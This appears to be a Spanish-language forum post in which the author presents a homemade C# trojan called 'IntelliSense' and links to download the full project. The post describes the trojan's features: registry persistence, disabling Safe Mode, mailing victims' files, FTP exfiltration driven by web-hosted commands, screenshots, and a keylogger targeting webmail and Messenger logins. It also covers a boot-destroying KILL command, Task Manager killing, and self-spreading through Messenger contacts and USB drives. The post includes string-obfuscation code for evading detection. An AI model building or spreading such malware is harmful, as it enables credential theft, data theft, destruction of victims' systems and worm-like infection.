Nombre de la Herramienta: IntelliSense
Lenguaje: C#.NET
Descripcion:
IntelliSense es una técnica que se me ocurrió para sacar información y obtener control remoto de una PC o Red enviando ordenes vía web desde cualquier equipo público o privado y cualquier Sistema Operativo con un navegador o cliente FTP.
IntelliSense puede ser aplicado al lenguaje de programación que más nos guste.
Como funciona?
Al iniciar el programa verificara si se encuentra en una cuenta de Administrador u otro tipo, dependiendo de la cuenta elegirá donde se copiara y si modificara el registro para el auto inicio, deshabilitado del Safe Mode y otras cosas.
Una vez realizada la autocopia listara los archivos que se encuentren en Mis Documentos y el Escritorio para enviarlos vía mail (escogí Gmail para la demostración) a nuestra cuenta además de algunos datos de la víctima. Luego empezara a leer las ordenes web que se encuentren en un archivo "1.txt" que tengamos alojado en alguna pagina web con el siguiente formato:
"PC:ORDEN"
Donde "PC" puede corresponder a la IP pública, IP privada, Nombre de Usuario o Nombre de Usuario de Dominio para poder enviar la orden a una máquina especifica y si necesitáramos enviarla a todos los PC's se puede usar ALL.
"ORDEN" se refiere a la orden que enviamos a la PC el diseño actual cuenta con
4 ordenes:
CAPTURA: que envía vía mail una captura de pantalla.
KILL: que reemplaza los archivos principales de arranque para evitar el inicio de Windows y reinicia el equipo.
KEYLOG: que envía los datos sustraídos (si los hubiera) de cuentas de correo (páginas en español) como GMAIL, Windows Live Messenger, Hotmail ,Yahoo u otras que especifiquemos.
default: que envía por FTP uno, varios o todos los archivos que queramos utilizando Winrar para comprimirlos, si por ejemplo pusiéramos en la orden:
"*.*" enviara todos los archivos listados
"*.JPG" enviara solo los archivos con dicha extensión.
"documentos.doc" enviara dicho archivo.
Tb cuenta con métodos de protección matando el proceso del Task Manager y si se ingresa a la carpeta donde se encuentre activara la protección igual que con "KILL".
El keylogger solo se activa cuando se ingresa a las páginas que especifiquemos y cada media hora si hay datos que enviar lo hará vía mail.
En la propagación por Messenger lista todos los contactos que se encuentren en la cuenta actual e ira enviando un link de descarga y una copia de si mismo comprimida a cada contacto, si el contacto esta "conectado" recibirá el link de descarga mas la copia comprimida, en otra caso recibirá solo el link de descarga.
En la replicación por USB listara las carpetas de la unidad USB y las ocultara para luego crear copias de sí mismo con los nombres de dichas carpetas (ya se ha visto en replicación USB).
Además cuenta con la posibilidad de complicar un poco la lectura de los string's utilizados mediante conversión de cada carácter en su valor decimal, para automatizar esto se puede usar un pequeño programa que tenga 3 textBox y un button con el siguiente código:
Código
textBox2.Text = ""; foreach (char a in textBox1.Text) { textBox2.Text += Convert.ToInt32(a) + " "; } textBox3.Text = @"int[] variable = {" + textBox2.Text.Trim ().Replace(" ", ",") + "};";
Código
string cadena = ""; foreach (int i in variable) { cadena += encod(i); } private string encod(int num) { string codif = char.ConvertFromUtf32(num); return codif; }
Un ejemplo de su aplicación está en "private void regist()". Además la modificación al registro permite que la autocopia al sistema tenga cualquier extensión, es decir si se copiara como *.txt igualmente se ejecutaría.
Todavía falta agregar y corregir algunos detalles como detección y captura de cámaras disponibles y algunas cosas más.
Link de descarga del proyecto:
http://www.4shared.com/file/106746397/2040d87e/IntelliSense.html
...